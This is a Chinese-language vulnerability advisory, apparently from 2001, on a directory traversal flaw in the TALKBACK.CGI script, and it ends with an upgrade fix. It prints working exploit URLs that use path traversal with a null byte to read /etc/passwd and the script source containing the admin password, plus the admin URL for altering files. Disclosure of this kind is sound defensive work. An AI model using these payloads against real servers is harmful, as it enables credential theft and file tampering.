TALKBACK.CGI 泄露系统信息漏洞

/ns/ld/softld/data/20010414060339.htm


涉及程序:
TALKBACK.CGI

描述:
构造特殊的 URL 导致 TALKBACK.CGI 目录遍历漏洞

详细:
发现 TALKBACK.CGI 脚本存在漏洞,攻击者通过构造特殊的 URL 能浏览受影响系统中的任何文件。

以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负


http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?article=
../../../../../../../../etc/passwd%00&action=view&matchview=1
能显示 /etc/passwd(如果 WEBSERVER 对该文件有访问权)

http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?article=
../cgi-bin/talkback.cgi%00&action=view&matchview=1
这将显示包含管理员密码的 TALKBACK.CGI 源代码。

利用上面得到的信息,攻击者能删改文件:
http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?action=admin

受影响系统:
运行 TALKBACK.CGI 脚本的 UNIX 系统




--------------------------------------------------------------------------------

解决办法:
建议您下载安装 TALKBACK 升级版本:
http://www.waytotheweb.com/webscripts/talkback.htm